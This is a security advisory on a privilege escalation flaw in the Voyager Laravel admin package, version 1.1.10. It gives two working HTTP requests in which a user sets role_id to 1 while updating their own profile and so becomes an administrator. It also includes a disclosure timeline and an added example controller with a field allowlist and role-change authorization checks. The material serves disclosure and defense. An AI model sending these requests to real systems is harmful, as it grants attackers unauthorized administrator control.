#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product:  Voyager
# Vendor:   The Control Group (Open Source)
# CSNC ID:  CSNC-2018-39
# Subject:  Privilege Escalation
# Risk:     High (CVSS 3.0 Base Score: 8.1)
# CVSS 3.0: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N/E:P/RL:O/RC:C
# Effect:   Remotely exploitable
# Author:   Fabio Poloni
# Date:     07.11.2018
#
#############################################################

Introduction:
-------------

Voyager [1] is a Laravel Admin Package that includes BREAD (CRUD) operations, a
media manager, a menu builder, and much more.

A user can read and update their own profile. However, it is possible for a
user to assign themselves a role with higher privileges.

Affected:
---------

Vulnerable:
 * Version 1.1.10

Other versions are not tested.

Technical Description
---------------------

A user can assign themselves a new `role_id` while updating their own profile.
The field is not part of the regular profile form; it has to be added to the
request manually and must be set to a valid `role_id`. By default, the id of
the administrator role is 1.

````
POST /admin/users/2 HTTP/1.1
Host: localhost:8000
X-CSRF-TOKEN: [...]
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------1015722260128466940934609617
Content-Length: 1359
Cookie: XSRF-TOKEN=[...]; laravel_session=[...]

-----------------------------1015722260128466940934609617
Content-Disposition: form-data; name="_method"

PUT
-----------------------------1015722260128466940934609617
Content-Disposition: form-data; name="_token"

[...]
-----------------------------1015722260128466940934609617
Content-Disposition: form-data; name="name"

user
-----------------------------1015722260128466940934609617
Content-Disposition: form-data; name="email"

user@user.com
-----------------------------1015722260128466940934609617
Content-Disposition: form-data; name="password"


-----------------------------1015722260128466940934609617
Content-Disposition: form-data; name="role_id"

1
-----------------------------1015722260128466940934609617
Content-Disposition: form-data; name="user_belongstomany_role_relationship[]"


-----------------------------1015722260128466940934609617
Content-Disposition: form-data; name=""


-----------------------------1015722260128466940934609617
Content-Disposition: form-data; name="locale"

en
-----------------------------1015722260128466940934609617
Content-Disposition: form-data; name=""


-----------------------------1015722260128466940934609617
Content-Disposition: form-data; name="_validate"

1
-----------------------------1015722260128466940934609617--
````

For some reason, a second request is required for the `role_id` to be saved
correctly:

````
POST /admin/users/2 HTTP/1.1
Host: localhost:8000
Content-Type: multipart/form-data; boundary=---------------------------60845160970064778167421123
Content-Length: 1040
Cookie: XSRF-TOKEN=[...]; laravel_session=[...]

-----------------------------60845160970064778167421123
Content-Disposition: form-data; name="_method"

PUT
-----------------------------60845160970064778167421123
Content-Disposition: form-data; name="_token"

[...]
-----------------------------60845160970064778167421123
Content-Disposition: form-data; name="name"

user
-----------------------------60845160970064778167421123
Content-Disposition: form-data; name="email"

user@user.com
-----------------------------60845160970064778167421123
Content-Disposition: form-data; name="password"


-----------------------------60845160970064778167421123
Content-Disposition: form-data; name="role_id"

1
-----------------------------60845160970064778167421123
Content-Disposition: form-data; name="locale"

en
-----------------------------60845160970064778167421123
Content-Disposition: form-data; name="avatar"; filename=""
Content-Type: application/octet-stream


-----------------------------60845160970064778167421123--
````

The user with id 2 is now an administrator.

Vulnerability Classification
----------------------------

 * CVSS v3.0 Base Score: 8.1
 * CVSS v3.0 Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N/E:P/RL:O/RC:C

Remediation
-----------

Update to the latest release (1.2.0). Please see Voyager releases [2] for
release notes and download links.

Timeline
--------

2019-03-05: According to the vendor, the vulnerability has been addressed
            (https://github.com/the-control-group/voyager/pull/3016)
2018-12-20: Vulnerabilities confirmed
2018-12-18: Fifth contact attempt via email to a former and a current
            maintainer, response received
2018-11-23: Fourth contact attempt via email (hello@thecontrolgroup.com) and
            direct contact to an employee on LinkedIn
2018-11-16: Third contact attempt via email (hello@thecontrolgroup.com)
2018-11-14: Second contact attempt via Twitter (@ControlGroup_SD)
2018-11-07: Initial vendor notification via contact form
            (https://thecontrolgroup.com/contact)
2018-11-05: Discovery by Fabio Poloni

References:
-----------

[1] https://github.com/the-control-group/voyager
[2] https://github.com/the-control-group/voyager/releases
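The root cause described in the Technical Description is a profile update
handler that accepts whatever fields arrive in the multipart body, including
`role_id` and the role relationship array, without checking whether the
caller is allowed to change roles. The following Laravel controller method
is an added illustration of the defensive pattern (explicit field allowlist
plus a separate authorization check for role changes); it is not Voyager's
code and not the vendor's fix from the pull request above. The `User` model,
its `roles()` relation, the `users.edit` and `users.edit-roles` Gate
abilities and the `roles` table are assumptions for the example.

```php
<?php
// Added example of a hardened self-service profile update for a Laravel app.
// Not taken from Voyager. Assumed: a User model with a `role_id` column, a
// `roles` table, and Gate abilities `users.edit` / `users.edit-roles`.

namespace App\Http\Controllers;

use App\Models\User;
use Illuminate\Http\Request;
use Illuminate\Support\Facades\Gate;
use Illuminate\Validation\Rule;

class ProfileController extends Controller
{
    // The only fields a user may change on their own profile. Anything else
    // in the request body (role_id, relationship arrays, ...) never reaches
    // the model unless it passes the explicit role check below.
    private const SELF_EDITABLE = ['name', 'email', 'password', 'locale', 'avatar'];

    public function update(Request $request, User $user)
    {
        // Authorization first: the account owner, or someone explicitly
        // allowed to edit other accounts.
        if ($request->user()->id !== $user->id && Gate::denies('users.edit', $user)) {
            abort(403);
        }

        // Validate only allowlisted fields. Unknown keys are dropped here,
        // so this is the mass-assignment boundary regardless of what the
        // model's $fillable says.
        $data = $request->validate([
            'name'     => ['sometimes', 'string', 'max:255'],
            'email'    => ['sometimes', 'email', Rule::unique('users')->ignore($user->id)],
            'password' => ['sometimes', 'nullable', 'string', 'min:8'],
            'locale'   => ['sometimes', 'string', 'max:10'],
            'avatar'   => ['sometimes', 'nullable', 'image', 'max:2048'],
        ]);

        // A role change is a privileged operation in its own right. Refuse
        // it explicitly (and record the attempt) instead of silently
        // ignoring the field, so that abuse is visible to operators.
        $touchesRole = $request->has('role_id')
            || $request->has('user_belongstomany_role_relationship');

        if ($touchesRole) {
            if (Gate::denies('users.edit-roles')) {
                report(new \RuntimeException(sprintf(
                    'User %d attempted to change the role of user %d',
                    $request->user()->id,
                    $user->id
                )));
                abort(403, 'Role changes require administrator privileges.');
            }
            // Only a valid, existing role id is accepted even for admins.
            $data['role_id'] = $request->validate([
                'role_id' => ['required', 'integer', Rule::exists('roles', 'id')],
            ])['role_id'];
        }

        // An empty password field means "leave unchanged".
        if (array_key_exists('password', $data)) {
            if ($data['password'] === null || $data['password'] === '') {
                unset($data['password']);
            } else {
                $data['password'] = bcrypt($data['password']);
            }
        }

        // An avatar part with an empty filename (as in the second request
        // above) is not a file upload; do not overwrite the stored path.
        if ($request->hasFile('avatar')) {
            $data['avatar'] = $request->file('avatar')->store('avatars', 'public');
        } else {
            unset($data['avatar']);
        }

        // Second line of defence: intersect with the allowlist again before
        // filling, so a later change to $fillable cannot widen this path.
        $allowed = array_flip([...self::SELF_EDITABLE, 'role_id']);
        $user->fill(array_intersect_key($data, $allowed));
        $user->save();

        return response()->json(['status' => 'ok']);
    }
}
```

The important design choice is that the role check is keyed on the presence
of the field in the request, not on whether the form normally sends it: the
advisory's requests add `role_id` by hand, so any handler that trusts the
form layout rather than the incoming data remains exposed. Rejecting with
403 and calling `report()` also gives the operations team a log line to
alert on, which silently filtering the field would not.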